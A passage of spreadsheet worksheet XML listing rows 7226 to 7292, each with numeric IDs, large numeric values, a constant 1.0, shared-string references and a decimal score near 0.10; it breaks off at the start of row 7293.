    <row r="7226" ht="15.75" customHeight="1">
      <c r="A7226" s="1">
        <v>20580.0</v>
      </c>
      <c r="B7226" s="2">
        <v>1.3691736E7</v>
      </c>
      <c r="C7226" s="2" t="s">
        <v>6853</v>
      </c>
      <c r="D7226" s="2">
        <v>1.0</v>
      </c>
      <c r="E7226" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7226" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="7227" ht="15.75" customHeight="1">
      <c r="A7227" s="1">
        <v>30803.0</v>
      </c>
      <c r="B7227" s="2">
        <v>4.5219883E7</v>
      </c>
      <c r="C7227" s="2" t="s">
        <v>6854</v>
      </c>
      <c r="D7227" s="2">
        <v>1.0</v>
      </c>
      <c r="E7227" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7227" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="7228" ht="15.75" customHeight="1">
      <c r="A7228" s="1">
        <v>25592.0</v>
      </c>
      <c r="B7228" s="2">
        <v>1.4354457E7</v>
      </c>
      <c r="C7228" s="2" t="s">
        <v>6855</v>
      </c>
      <c r="D7228" s="2">
        <v>1.0</v>
      </c>
      <c r="E7228" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7228" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="7229" ht="15.75" customHeight="1">
      <c r="A7229" s="1">
        <v>25758.0</v>
      </c>
      <c r="B7229" s="2">
        <v>1.4612645E7</v>
      </c>
      <c r="C7229" s="2" t="s">
        <v>6856</v>
      </c>
      <c r="D7229" s="2">
        <v>1.0</v>
      </c>
      <c r="E7229" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7229" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="7230" ht="15.75" customHeight="1">
      <c r="A7230" s="1">
        <v>27861.0</v>
      </c>
      <c r="B7230" s="2">
        <v>2.3504737E7</v>
      </c>
      <c r="C7230" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="D7230" s="2">
        <v>1.0</v>
      </c>
      <c r="E7230" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7230" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="7231" ht="15.75" customHeight="1">
      <c r="A7231" s="1">
        <v>29669.0</v>
      </c>
      <c r="B7231" s="2">
        <v>3.3952722E7</v>
      </c>
      <c r="C7231" s="2" t="s">
        <v>6857</v>
      </c>
      <c r="D7231" s="2">
        <v>1.0</v>
      </c>
      <c r="E7231" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7231" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="7232" ht="15.75" customHeight="1">
      <c r="A7232" s="1">
        <v>3905.0</v>
      </c>
      <c r="B7232" s="2">
        <v>4.0481692E7</v>
      </c>
      <c r="C7232" s="2" t="s">
        <v>6858</v>
      </c>
      <c r="D7232" s="2">
        <v>1.0</v>
      </c>
      <c r="E7232" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7232" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="7233" ht="15.75" customHeight="1">
      <c r="A7233" s="1">
        <v>22512.0</v>
      </c>
      <c r="B7233" s="2">
        <v>3.7474401E7</v>
      </c>
      <c r="C7233" s="2" t="s">
        <v>6859</v>
      </c>
      <c r="D7233" s="2">
        <v>1.0</v>
      </c>
      <c r="E7233" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7233" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="7234" ht="15.75" customHeight="1">
      <c r="A7234" s="1">
        <v>23685.0</v>
      </c>
      <c r="B7234" s="2">
        <v>7000891.0</v>
      </c>
      <c r="C7234" s="2" t="s">
        <v>6860</v>
      </c>
      <c r="D7234" s="2">
        <v>1.0</v>
      </c>
      <c r="E7234" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7234" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="7235" ht="15.75" customHeight="1">
      <c r="A7235" s="1">
        <v>24165.0</v>
      </c>
      <c r="B7235" s="2">
        <v>1.016574E7</v>
      </c>
      <c r="C7235" s="2" t="s">
        <v>6861</v>
      </c>
      <c r="D7235" s="2">
        <v>1.0</v>
      </c>
      <c r="E7235" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7235" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="7236" ht="15.75" customHeight="1">
      <c r="A7236" s="1">
        <v>24921.0</v>
      </c>
      <c r="B7236" s="2">
        <v>1.2400762E7</v>
      </c>
      <c r="C7236" s="2" t="s">
        <v>6862</v>
      </c>
      <c r="D7236" s="2">
        <v>1.0</v>
      </c>
      <c r="E7236" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7236" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="7237" ht="15.75" customHeight="1">
      <c r="A7237" s="1">
        <v>26561.0</v>
      </c>
      <c r="B7237" s="2">
        <v>1.780841E7</v>
      </c>
      <c r="C7237" s="2" t="s">
        <v>6863</v>
      </c>
      <c r="D7237" s="2">
        <v>1.0</v>
      </c>
      <c r="E7237" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7237" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="7238" ht="15.75" customHeight="1">
      <c r="A7238" s="1">
        <v>28446.0</v>
      </c>
      <c r="B7238" s="2">
        <v>2.6542793E7</v>
      </c>
      <c r="C7238" s="2" t="s">
        <v>6864</v>
      </c>
      <c r="D7238" s="2">
        <v>1.0</v>
      </c>
      <c r="E7238" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7238" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="7239" ht="15.75" customHeight="1">
      <c r="A7239" s="1">
        <v>32576.0</v>
      </c>
      <c r="B7239" s="2">
        <v>5772895.0</v>
      </c>
      <c r="C7239" s="2" t="s">
        <v>6865</v>
      </c>
      <c r="D7239" s="2">
        <v>1.0</v>
      </c>
      <c r="E7239" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7239" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="7240" ht="15.75" customHeight="1">
      <c r="A7240" s="1">
        <v>12008.0</v>
      </c>
      <c r="B7240" s="2">
        <v>2.5976366E7</v>
      </c>
      <c r="C7240" s="2" t="s">
        <v>6866</v>
      </c>
      <c r="D7240" s="2">
        <v>1.0</v>
      </c>
      <c r="E7240" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7240" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="7241" ht="15.75" customHeight="1">
      <c r="A7241" s="1">
        <v>30348.0</v>
      </c>
      <c r="B7241" s="2">
        <v>3.8235738E7</v>
      </c>
      <c r="C7241" s="2" t="s">
        <v>6867</v>
      </c>
      <c r="D7241" s="2">
        <v>1.0</v>
      </c>
      <c r="E7241" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7241" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="7242" ht="15.75" customHeight="1">
      <c r="A7242" s="1">
        <v>33632.0</v>
      </c>
      <c r="B7242" s="2">
        <v>8358116.0</v>
      </c>
      <c r="C7242" s="2" t="s">
        <v>6868</v>
      </c>
      <c r="D7242" s="2">
        <v>1.0</v>
      </c>
      <c r="E7242" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7242" s="2">
        <v>0.1026365348399247</v>
      </c>
    </row>
    <row r="7243" ht="15.75" customHeight="1">
      <c r="A7243" s="1">
        <v>28437.0</v>
      </c>
      <c r="B7243" s="2">
        <v>2.6485566E7</v>
      </c>
      <c r="C7243" s="2" t="s">
        <v>6869</v>
      </c>
      <c r="D7243" s="2">
        <v>1.0</v>
      </c>
      <c r="E7243" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7243" s="2">
        <v>0.1026365348399246</v>
      </c>
    </row>
    <row r="7244" ht="15.75" customHeight="1">
      <c r="A7244" s="1">
        <v>23056.0</v>
      </c>
      <c r="B7244" s="2">
        <v>5.0278179E7</v>
      </c>
      <c r="C7244" s="2" t="s">
        <v>6870</v>
      </c>
      <c r="D7244" s="2">
        <v>1.0</v>
      </c>
      <c r="E7244" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7244" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="7245" ht="15.75" customHeight="1">
      <c r="A7245" s="1">
        <v>3036.0</v>
      </c>
      <c r="B7245" s="2">
        <v>3.6483618E7</v>
      </c>
      <c r="C7245" s="2" t="s">
        <v>6871</v>
      </c>
      <c r="D7245" s="2">
        <v>1.0</v>
      </c>
      <c r="E7245" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7245" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="7246" ht="15.75" customHeight="1">
      <c r="A7246" s="1">
        <v>19453.0</v>
      </c>
      <c r="B7246" s="2">
        <v>5.5733737E7</v>
      </c>
      <c r="C7246" s="2" t="s">
        <v>6872</v>
      </c>
      <c r="D7246" s="2">
        <v>1.0</v>
      </c>
      <c r="E7246" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7246" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="7247" ht="15.75" customHeight="1">
      <c r="A7247" s="1">
        <v>21910.0</v>
      </c>
      <c r="B7247" s="2">
        <v>2.8122257E7</v>
      </c>
      <c r="C7247" s="2" t="s">
        <v>6873</v>
      </c>
      <c r="D7247" s="2">
        <v>1.0</v>
      </c>
      <c r="E7247" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7247" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="7248" ht="15.75" customHeight="1">
      <c r="A7248" s="1">
        <v>1404.0</v>
      </c>
      <c r="B7248" s="2">
        <v>2.63047E7</v>
      </c>
      <c r="C7248" s="2" t="s">
        <v>6874</v>
      </c>
      <c r="D7248" s="2">
        <v>1.0</v>
      </c>
      <c r="E7248" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7248" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="7249" ht="15.75" customHeight="1">
      <c r="A7249" s="1">
        <v>5785.0</v>
      </c>
      <c r="B7249" s="2">
        <v>4.6753912E7</v>
      </c>
      <c r="C7249" s="2" t="s">
        <v>6875</v>
      </c>
      <c r="D7249" s="2">
        <v>1.0</v>
      </c>
      <c r="E7249" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7249" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="7250" ht="15.75" customHeight="1">
      <c r="A7250" s="1">
        <v>23098.0</v>
      </c>
      <c r="B7250" s="2">
        <v>5078947.0</v>
      </c>
      <c r="C7250" s="2" t="s">
        <v>6876</v>
      </c>
      <c r="D7250" s="2">
        <v>1.0</v>
      </c>
      <c r="E7250" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7250" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="7251" ht="15.75" customHeight="1">
      <c r="A7251" s="1">
        <v>23717.0</v>
      </c>
      <c r="B7251" s="2">
        <v>7198194.0</v>
      </c>
      <c r="C7251" s="2" t="s">
        <v>6877</v>
      </c>
      <c r="D7251" s="2">
        <v>1.0</v>
      </c>
      <c r="E7251" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7251" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="7252" ht="15.75" customHeight="1">
      <c r="A7252" s="1">
        <v>27176.0</v>
      </c>
      <c r="B7252" s="2">
        <v>2.0865714E7</v>
      </c>
      <c r="C7252" s="2" t="s">
        <v>6878</v>
      </c>
      <c r="D7252" s="2">
        <v>1.0</v>
      </c>
      <c r="E7252" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7252" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="7253" ht="15.75" customHeight="1">
      <c r="A7253" s="1">
        <v>29949.0</v>
      </c>
      <c r="B7253" s="2">
        <v>3607595.0</v>
      </c>
      <c r="C7253" s="2" t="s">
        <v>6879</v>
      </c>
      <c r="D7253" s="2">
        <v>1.0</v>
      </c>
      <c r="E7253" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7253" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="7254" ht="15.75" customHeight="1">
      <c r="A7254" s="1">
        <v>31844.0</v>
      </c>
      <c r="B7254" s="2">
        <v>5273629.0</v>
      </c>
      <c r="C7254" s="2" t="s">
        <v>6880</v>
      </c>
      <c r="D7254" s="2">
        <v>1.0</v>
      </c>
      <c r="E7254" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7254" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="7255" ht="15.75" customHeight="1">
      <c r="A7255" s="1">
        <v>32667.0</v>
      </c>
      <c r="B7255" s="2">
        <v>5930218.0</v>
      </c>
      <c r="C7255" s="2" t="s">
        <v>6881</v>
      </c>
      <c r="D7255" s="2">
        <v>1.0</v>
      </c>
      <c r="E7255" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7255" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="7256" ht="15.75" customHeight="1">
      <c r="A7256" s="1">
        <v>9896.0</v>
      </c>
      <c r="B7256" s="2">
        <v>5.6770536E7</v>
      </c>
      <c r="C7256" s="2" t="s">
        <v>6611</v>
      </c>
      <c r="D7256" s="2">
        <v>1.0</v>
      </c>
      <c r="E7256" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7256" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7257" ht="15.75" customHeight="1">
      <c r="A7257" s="1">
        <v>11716.0</v>
      </c>
      <c r="B7257" s="2">
        <v>2.3727661E7</v>
      </c>
      <c r="C7257" s="2" t="s">
        <v>6882</v>
      </c>
      <c r="D7257" s="2">
        <v>1.0</v>
      </c>
      <c r="E7257" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7257" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7258" ht="15.75" customHeight="1">
      <c r="A7258" s="1">
        <v>13550.0</v>
      </c>
      <c r="B7258" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C7258" s="2" t="s">
        <v>6883</v>
      </c>
      <c r="D7258" s="2">
        <v>1.0</v>
      </c>
      <c r="E7258" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7258" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7259" ht="15.75" customHeight="1">
      <c r="A7259" s="1">
        <v>16908.0</v>
      </c>
      <c r="B7259" s="2">
        <v>4.8120706E7</v>
      </c>
      <c r="C7259" s="2" t="s">
        <v>6884</v>
      </c>
      <c r="D7259" s="2">
        <v>1.0</v>
      </c>
      <c r="E7259" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7259" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7260" ht="15.75" customHeight="1">
      <c r="A7260" s="1">
        <v>20687.0</v>
      </c>
      <c r="B7260" s="2">
        <v>1.4486876E7</v>
      </c>
      <c r="C7260" s="2" t="s">
        <v>6885</v>
      </c>
      <c r="D7260" s="2">
        <v>1.0</v>
      </c>
      <c r="E7260" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7260" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7261" ht="15.75" customHeight="1">
      <c r="A7261" s="1">
        <v>24579.0</v>
      </c>
      <c r="B7261" s="2">
        <v>1.1328985E7</v>
      </c>
      <c r="C7261" s="2" t="s">
        <v>6886</v>
      </c>
      <c r="D7261" s="2">
        <v>1.0</v>
      </c>
      <c r="E7261" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7261" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7262" ht="15.75" customHeight="1">
      <c r="A7262" s="1">
        <v>27152.0</v>
      </c>
      <c r="B7262" s="2">
        <v>2.0781953E7</v>
      </c>
      <c r="C7262" s="2" t="s">
        <v>6887</v>
      </c>
      <c r="D7262" s="2">
        <v>1.0</v>
      </c>
      <c r="E7262" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7262" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7263" ht="15.75" customHeight="1">
      <c r="A7263" s="1">
        <v>27901.0</v>
      </c>
      <c r="B7263" s="2">
        <v>2.3676884E7</v>
      </c>
      <c r="C7263" s="2" t="s">
        <v>6888</v>
      </c>
      <c r="D7263" s="2">
        <v>1.0</v>
      </c>
      <c r="E7263" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7263" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7264" ht="15.75" customHeight="1">
      <c r="A7264" s="1">
        <v>32936.0</v>
      </c>
      <c r="B7264" s="2">
        <v>6458821.0</v>
      </c>
      <c r="C7264" s="2" t="s">
        <v>6889</v>
      </c>
      <c r="D7264" s="2">
        <v>1.0</v>
      </c>
      <c r="E7264" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7264" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="7265" ht="15.75" customHeight="1">
      <c r="A7265" s="1">
        <v>22518.0</v>
      </c>
      <c r="B7265" s="2">
        <v>3.7598103E7</v>
      </c>
      <c r="C7265" s="2" t="s">
        <v>6890</v>
      </c>
      <c r="D7265" s="2">
        <v>1.0</v>
      </c>
      <c r="E7265" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7265" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="7266" ht="15.75" customHeight="1">
      <c r="A7266" s="1">
        <v>25745.0</v>
      </c>
      <c r="B7266" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C7266" s="2" t="s">
        <v>6891</v>
      </c>
      <c r="D7266" s="2">
        <v>1.0</v>
      </c>
      <c r="E7266" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7266" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="7267" ht="15.75" customHeight="1">
      <c r="A7267" s="1">
        <v>29840.0</v>
      </c>
      <c r="B7267" s="2">
        <v>3.5566805E7</v>
      </c>
      <c r="C7267" s="2" t="s">
        <v>6892</v>
      </c>
      <c r="D7267" s="2">
        <v>1.0</v>
      </c>
      <c r="E7267" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7267" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="7268" ht="15.75" customHeight="1">
      <c r="A7268" s="1">
        <v>30597.0</v>
      </c>
      <c r="B7268" s="2">
        <v>4.1331099E7</v>
      </c>
      <c r="C7268" s="2" t="s">
        <v>6893</v>
      </c>
      <c r="D7268" s="2">
        <v>1.0</v>
      </c>
      <c r="E7268" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7268" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="7269" ht="15.75" customHeight="1">
      <c r="A7269" s="1">
        <v>33696.0</v>
      </c>
      <c r="B7269" s="2">
        <v>8463592.0</v>
      </c>
      <c r="C7269" s="2" t="s">
        <v>6894</v>
      </c>
      <c r="D7269" s="2">
        <v>1.0</v>
      </c>
      <c r="E7269" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7269" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="7270" ht="15.75" customHeight="1">
      <c r="A7270" s="1">
        <v>21247.0</v>
      </c>
      <c r="B7270" s="2">
        <v>1.9948285E7</v>
      </c>
      <c r="C7270" s="2" t="s">
        <v>6895</v>
      </c>
      <c r="D7270" s="2">
        <v>1.0</v>
      </c>
      <c r="E7270" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7270" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="7271" ht="15.75" customHeight="1">
      <c r="A7271" s="1">
        <v>27443.0</v>
      </c>
      <c r="B7271" s="2">
        <v>2.1981757E7</v>
      </c>
      <c r="C7271" s="2" t="s">
        <v>6896</v>
      </c>
      <c r="D7271" s="2">
        <v>1.0</v>
      </c>
      <c r="E7271" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7271" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="7272" ht="15.75" customHeight="1">
      <c r="A7272" s="1">
        <v>34037.0</v>
      </c>
      <c r="B7272" s="2">
        <v>9567498.0</v>
      </c>
      <c r="C7272" s="2" t="s">
        <v>6897</v>
      </c>
      <c r="D7272" s="2">
        <v>1.0</v>
      </c>
      <c r="E7272" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7272" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="7273" ht="15.75" customHeight="1">
      <c r="A7273" s="1">
        <v>16585.0</v>
      </c>
      <c r="B7273" s="2">
        <v>4.6923345E7</v>
      </c>
      <c r="C7273" s="2" t="s">
        <v>6898</v>
      </c>
      <c r="D7273" s="2">
        <v>1.0</v>
      </c>
      <c r="E7273" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7273" s="2">
        <v>0.1015625</v>
      </c>
    </row>
    <row r="7274" ht="15.75" customHeight="1">
      <c r="A7274" s="1">
        <v>16212.0</v>
      </c>
      <c r="B7274" s="2">
        <v>4.570433E7</v>
      </c>
      <c r="C7274" s="2" t="s">
        <v>6899</v>
      </c>
      <c r="D7274" s="2">
        <v>1.0</v>
      </c>
      <c r="E7274" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7274" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="7275" ht="15.75" customHeight="1">
      <c r="A7275" s="1">
        <v>19462.0</v>
      </c>
      <c r="B7275" s="2">
        <v>5.5776861E7</v>
      </c>
      <c r="C7275" s="2" t="s">
        <v>6900</v>
      </c>
      <c r="D7275" s="2">
        <v>1.0</v>
      </c>
      <c r="E7275" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7275" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="7276" ht="15.75" customHeight="1">
      <c r="A7276" s="1">
        <v>14941.0</v>
      </c>
      <c r="B7276" s="2">
        <v>4.1253568E7</v>
      </c>
      <c r="C7276" s="2" t="s">
        <v>6901</v>
      </c>
      <c r="D7276" s="2">
        <v>1.0</v>
      </c>
      <c r="E7276" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7276" s="2">
        <v>0.1014109347442681</v>
      </c>
    </row>
    <row r="7277" ht="15.75" customHeight="1">
      <c r="A7277" s="1">
        <v>1286.0</v>
      </c>
      <c r="B7277" s="2">
        <v>2.5591406E7</v>
      </c>
      <c r="C7277" s="2" t="s">
        <v>6902</v>
      </c>
      <c r="D7277" s="2">
        <v>1.0</v>
      </c>
      <c r="E7277" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7277" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7278" ht="15.75" customHeight="1">
      <c r="A7278" s="1">
        <v>1446.0</v>
      </c>
      <c r="B7278" s="2">
        <v>2.6825804E7</v>
      </c>
      <c r="C7278" s="2" t="s">
        <v>6903</v>
      </c>
      <c r="D7278" s="2">
        <v>1.0</v>
      </c>
      <c r="E7278" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7278" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7279" ht="15.75" customHeight="1">
      <c r="A7279" s="1">
        <v>1475.0</v>
      </c>
      <c r="B7279" s="2">
        <v>2.7110839E7</v>
      </c>
      <c r="C7279" s="2" t="s">
        <v>6903</v>
      </c>
      <c r="D7279" s="2">
        <v>1.0</v>
      </c>
      <c r="E7279" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7279" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7280" ht="15.75" customHeight="1">
      <c r="A7280" s="1">
        <v>2922.0</v>
      </c>
      <c r="B7280" s="2">
        <v>3.5862012E7</v>
      </c>
      <c r="C7280" s="2" t="s">
        <v>6904</v>
      </c>
      <c r="D7280" s="2">
        <v>1.0</v>
      </c>
      <c r="E7280" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7280" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7281" ht="15.75" customHeight="1">
      <c r="A7281" s="1">
        <v>3102.0</v>
      </c>
      <c r="B7281" s="2">
        <v>3.6708025E7</v>
      </c>
      <c r="C7281" s="2" t="s">
        <v>6905</v>
      </c>
      <c r="D7281" s="2">
        <v>1.0</v>
      </c>
      <c r="E7281" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7281" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7282" ht="15.75" customHeight="1">
      <c r="A7282" s="1">
        <v>3540.0</v>
      </c>
      <c r="B7282" s="2">
        <v>3.8693663E7</v>
      </c>
      <c r="C7282" s="2" t="s">
        <v>6906</v>
      </c>
      <c r="D7282" s="2">
        <v>1.0</v>
      </c>
      <c r="E7282" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7282" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7283" ht="15.75" customHeight="1">
      <c r="A7283" s="1">
        <v>3870.0</v>
      </c>
      <c r="B7283" s="2">
        <v>4.0339234E7</v>
      </c>
      <c r="C7283" s="2" t="s">
        <v>6907</v>
      </c>
      <c r="D7283" s="2">
        <v>1.0</v>
      </c>
      <c r="E7283" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7283" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7284" ht="15.75" customHeight="1">
      <c r="A7284" s="1">
        <v>4623.0</v>
      </c>
      <c r="B7284" s="2">
        <v>4.297643E7</v>
      </c>
      <c r="C7284" s="2" t="s">
        <v>6908</v>
      </c>
      <c r="D7284" s="2">
        <v>1.0</v>
      </c>
      <c r="E7284" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7284" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7285" ht="15.75" customHeight="1">
      <c r="A7285" s="1">
        <v>5243.0</v>
      </c>
      <c r="B7285" s="2">
        <v>4.5042802E7</v>
      </c>
      <c r="C7285" s="2" t="s">
        <v>6909</v>
      </c>
      <c r="D7285" s="2">
        <v>1.0</v>
      </c>
      <c r="E7285" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7285" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7286" ht="15.75" customHeight="1">
      <c r="A7286" s="1">
        <v>5933.0</v>
      </c>
      <c r="B7286" s="2">
        <v>4.7261472E7</v>
      </c>
      <c r="C7286" s="2" t="s">
        <v>6910</v>
      </c>
      <c r="D7286" s="2">
        <v>1.0</v>
      </c>
      <c r="E7286" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7286" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7287" ht="15.75" customHeight="1">
      <c r="A7287" s="1">
        <v>5935.0</v>
      </c>
      <c r="B7287" s="2">
        <v>4.7261472E7</v>
      </c>
      <c r="C7287" s="2" t="s">
        <v>6911</v>
      </c>
      <c r="D7287" s="2">
        <v>1.0</v>
      </c>
      <c r="E7287" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7287" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7288" ht="15.75" customHeight="1">
      <c r="A7288" s="1">
        <v>6256.0</v>
      </c>
      <c r="B7288" s="2">
        <v>4.8111026E7</v>
      </c>
      <c r="C7288" s="2" t="s">
        <v>6912</v>
      </c>
      <c r="D7288" s="2">
        <v>1.0</v>
      </c>
      <c r="E7288" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7288" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7289" ht="15.75" customHeight="1">
      <c r="A7289" s="1">
        <v>6575.0</v>
      </c>
      <c r="B7289" s="2">
        <v>4.8915204E7</v>
      </c>
      <c r="C7289" s="2" t="s">
        <v>6913</v>
      </c>
      <c r="D7289" s="2">
        <v>1.0</v>
      </c>
      <c r="E7289" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7289" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7290" ht="15.75" customHeight="1">
      <c r="A7290" s="1">
        <v>7647.0</v>
      </c>
      <c r="B7290" s="2">
        <v>5.1779523E7</v>
      </c>
      <c r="C7290" s="2" t="s">
        <v>6914</v>
      </c>
      <c r="D7290" s="2">
        <v>1.0</v>
      </c>
      <c r="E7290" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7290" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7291" ht="15.75" customHeight="1">
      <c r="A7291" s="1">
        <v>9010.0</v>
      </c>
      <c r="B7291" s="2">
        <v>5.4987255E7</v>
      </c>
      <c r="C7291" s="2" t="s">
        <v>6915</v>
      </c>
      <c r="D7291" s="2">
        <v>1.0</v>
      </c>
      <c r="E7291" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7291" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7292" ht="15.75" customHeight="1">
      <c r="A7292" s="1">
        <v>9326.0</v>
      </c>
      <c r="B7292" s="2">
        <v>5.5588617E7</v>
      </c>
      <c r="C7292" s="2" t="s">
        <v>6916</v>
      </c>
      <c r="D7292" s="2">
        <v>1.0</v>
      </c>
      <c r="E7292" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7292" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="7293" ht="15.75" customHeight="1">
